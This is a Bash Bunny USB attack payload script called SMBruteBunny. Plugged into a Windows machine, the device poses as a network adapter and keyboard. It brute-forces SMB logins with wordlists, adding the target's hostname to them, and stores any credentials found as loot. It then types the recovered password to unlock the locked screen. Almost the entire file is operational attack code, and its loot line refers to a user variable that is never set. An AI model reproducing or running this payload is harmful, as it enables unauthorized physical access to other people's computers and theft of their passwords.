#!/bin/bash
#
# Title:         SMBruteBunny
# Author:        Mohamed A. Baset (@SymbianSyMoh)
# Version:       1.0
# Targets:       Windows
# Attack Modes:  HID, RNDIS_ETHERNET
# Description:   Bruteforces open Windows SMB protocol for valid Credentials against the bruteforce
#                dictionnary stored in variables "$user_bruteforce_list" and "$pass_bruteforce_list"
#                then dump the results in text file stored in variable "$password_process_file" then
#                check for valid or invalid credentials, if valid creds found, store it loot in varaible
#                "$password_loot_file" then quack it to unlock the machine.
#
# LEDS:
# SETUP: Script Setup Stage.
# STAGE1: Script Stage1 Initialized "Bruteforcing the open SMB for valid Credentials".
# STAGE2: Script Stage2 Initialized "Checking Bruteforce results".
# GREEN: SMB Credentials Found.
# FAIL: SMB Credentials Not Found.
# CLEANUP: Cleaning up and Syncing filesystem.
# FINISH: Finished.


# Setup
LED SETUP
REQUIRETOOL impacket
CUCUMBER PLAID
mount /dev/nandf /root/udisk/
GET SWITCH_POSITION
BBSWITCH="/root/udisk/payloads/$SWITCH_POSITION"
password_process_file="$BBSWITCH/ppf.txt"
password_loot_file="$BBSWITCH/credentials.txt"
user_bruteforce_list="$BBSWITCH/userlist.txt"
pass_bruteforce_list="$BBSWITCH/passlist.txt"
mmcbrute_path="$BBSWITCH/mmcbrute"
ATTACKMODE HID RNDIS_ETHERNET
GET TARGET_IP
GET TARGET_HOSTNAME

# A little trick: Sometimes the host name is the same as the username so we will add it to the username and the password wordlists automatically to be used during the brute force attack.
echo $TARGET_HOSTNAME >> $user_bruteforce_list
echo $TARGET_HOSTNAME >> $pass_bruteforce_list

# Perform SMB bruteforce attack
LED STAGE1
python $mmcbrute_path/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file

# Check for results
LED STAGE2
if grep -q "Success" $password_process_file; then
LED G

# Extract and Store the loot, then quack it
pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2)
echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file

# Waking up the screen if sleeping, if not, pressing "ESC" won't affect anything
QUACK ESC
sleep 1
QUACK STRING $pass
sleep 1
QUACK ENTER
else
LED FAIL
fi

# Finishing
LED CLEANUP
sync; sleep 1; sync
LED FINISH
